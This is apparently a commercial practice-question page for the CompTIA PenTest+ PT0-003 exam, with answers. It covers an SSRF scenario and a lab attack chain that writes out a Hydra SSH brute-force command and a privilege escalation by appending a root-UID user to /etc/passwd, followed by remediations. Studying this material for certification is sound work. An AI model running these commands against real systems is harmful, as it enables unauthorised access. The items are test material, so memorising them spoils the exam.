CompTIA PT0-003 Exam Questions - Navigate Your Path to Success

The CompTIA PenTest+ Exam (PT0-003) exam is a good choice for Cybersecurity analysts Penetration Tester and if the candidate manages to pass CompTIA PenTest+ Exam, he/she will earn CompTIA PenTest+ Certification. Below are some essential facts for CompTIA PT0-003 exam candidates:

In actual CompTIA PenTest+ Exam (PT0-003) exam, a candidate can expect 90 Questions and the officially allowed time is expected to be around 165 Minutes.
TrendyCerts offers 216 Questions that are based on actual CompTIA PT0-003 syllabus.
Our CompTIA PT0-003 Exam Practice Questions were last updated on: Mar 08, 2025

Sample Questions for CompTIA PT0-003 Exam Preparation

Question 1

SIMULATION

A penetration tester performs several Nmap scans against the web application for a client.

INSTRUCTIONS

Click on the WAF and servers to review the results of the Nmap scans. Then click on

each tab to select the appropriate vulnerability and remediation options.

If at any time you would like to bring back the initial state of the simulation, please

click the Reset All button.

PT0-003 Exam Question 1 Exhibit 1

PT0-003 Exam Question 1 Exhibit 2

PT0-003 Exam Question 1 Exhibit 3

PT0-003 Exam Question 1 Exhibit 4

PT0-003 Exam Question 1 Exhibit 5

ASee the explanation part for detailed solution

Correct : A

Most likely vulnerability: Perform a SSRF attack against App01.example.com from CDN.example.com.

Two best remediation options:

Restrict direct communications to App01.example.com to only approved components.

Require an additional authentication header value between CDN.example.com and App01.example.com.

Restrict direct communications to App01.example.com to only approved components: This limits the exposure of the application server by ensuring that only specified, trusted entities can communicate with it.

Require an additional authentication header value between CDN.example.com and App01.example.com: Adding an authentication layer between the CDN and the app server helps ensure that requests are legitimate and originate from trusted sources, mitigating SSRF and other indirect attack vectors.

Nmap Scan Observations:

CDN/WAF shows open ports for HTTP and HTTPS but filtered for MySQL, indicating it acts as a filtering layer.

App Server has open ports for HTTP, HTTPS, and filtered for MySQL.

DB Server has all ports filtered, typical for a database server that should not be directly accessible.

These findings align with the SSRF vulnerability and the appropriate remediation steps to enhance the security of internal communications.

Options Selected by Other Users:

Question 2

SIMULATION

A previous penetration test report identified a host with vulnerabilities that was

successfully exploited. Management has requested that an internal member of the

security team reassess the host to determine if the vulnerability still exists.

PT0-003 Exam Question 2 Exhibit 1

Part 1:

. Analyze the output and select the command to exploit the vulnerable service.

Part 2:

. Analyze the output from each command.

* Select the appropriate set of commands to escalate privileges.

* Identify which remediation steps should be taken.

PT0-003 Exam Question 2 Exhibit 2

ASee the Explanation below for complete solution

Correct : A

The command that would most likely exploit the services is:

hydra -l lowpriv -P 500-worst-passwords.txt -t 4 ssh://192.168.10.2:22

The appropriate set of commands to escalate privileges is:

echo 'root2:5ZOYXRFHVZ7OY::0:0:root:/root:/bin/bash' >> /etc/passwd

The remediations that should be taken after the successful privilege escalation are:

Remove the SUID bit from cp.

Make backup script not world-writable.

Comprehensive Step-by-Step Explanation of the Simulation

Part 1: Exploiting Vulnerable Service

Nmap Scan Analysis

Command: nmap -sC -T4 192.168.10.2

Purpose: This command runs a default script scan with timing template 4 (aggressive).

Output:

bash

Copy code

Port State Service

22/tcp open ssh

23/tcp closed telnet

80/tcp open http

111/tcp closed rpcbind

445/tcp open samba

3389/tcp closed rdp

Ports open are SSH (22), HTTP (80), and Samba (445).

Enumerating Samba Shares

Command: enum4linux -S 192.168.10.2

Purpose: To enumerate Samba shares and users.

Output:

makefile

Copy code

user:[games] rid:[0x3f2]

user:[nobody] rid:[0x1f5]

user:[bind] rid:[0x4ba]

user:[proxy] rid:[0x42]

user:[syslog] rid:[0x4ba]

user:[www-data] rid:[0x42a]

user:[root] rid:[0x3e8]

user:[news] rid:[0x3fa]

user:[lowpriv] rid:[0x3fa]

We identify a user lowpriv.

Selecting Exploit Command

Hydra Command: hydra -l lowpriv -P 500-worst-passwords.txt -t 4 ssh://192.168.10.2:22

Purpose: To perform a brute force attack on SSH using the lowpriv user and a list of the 500 worst passwords.

-l lowpriv: Specifies the username.

-P 500-worst-passwords.txt: Specifies the password list.

-t 4: Uses 4 tasks/threads for the attack.

ssh://192.168.10.2:22: Specifies the SSH service and port.

Executing the Hydra Command

Result: Successful login as lowpriv user if a match is found.

Part 2: Privilege Escalation and Remediation

Finding SUID Binaries and Configuration Files

Command: find / -perm -2 -type f 2>/dev/null | xargs ls -l

Purpose: To find world-writable files.

Command: find / -perm -u=s -type f 2>/dev/null | xargs ls -l

Purpose: To find files with SUID permission.

Command: grep '/bin/bash' /etc/passwd | cut -d':' -f1-4,6,7

Purpose: To identify users with bash shell access.

Selecting Privilege Escalation Command

Command: echo 'root2:5ZOYXRFHVZ7OY::0:0:root:/root:/bin/bash' >> /etc/passwd

Purpose: To create a new root user entry in the passwd file.

root2: Username.

5ZOYXRFHVZ7OY: Password hash.

::0:0: User and group ID (root).

/root: Home directory.

/bin/bash: Default shell.

Executing the Privilege Escalation Command

Result: Creation of a new root user root2 with a specified password.

Remediation Steps Post-Exploitation

Remove SUID Bit from cp:

Command: chmod u-s /bin/cp

Purpose: Removing the SUID bit from cp to prevent misuse.

Make Backup Script Not World-Writable:

Command: chmod o-w /path/to/backup/script

Purpose: Ensuring backup script is not writable by all users to prevent unauthorized modifications.

Execution and Verification

Verifying Hydra Attack:

Run the Hydra command and monitor for successful login attempts.

Verifying Privilege Escalation:

After appending the new root user to the passwd file, attempt to switch user to root2 and check root privileges.

Implementing Remediation:

Apply the remediation commands to secure the system and verify the changes have been implemented.

By following these detailed steps, one can replicate the simulation and ensure a thorough understanding of both the exploitation and the necessary remediations.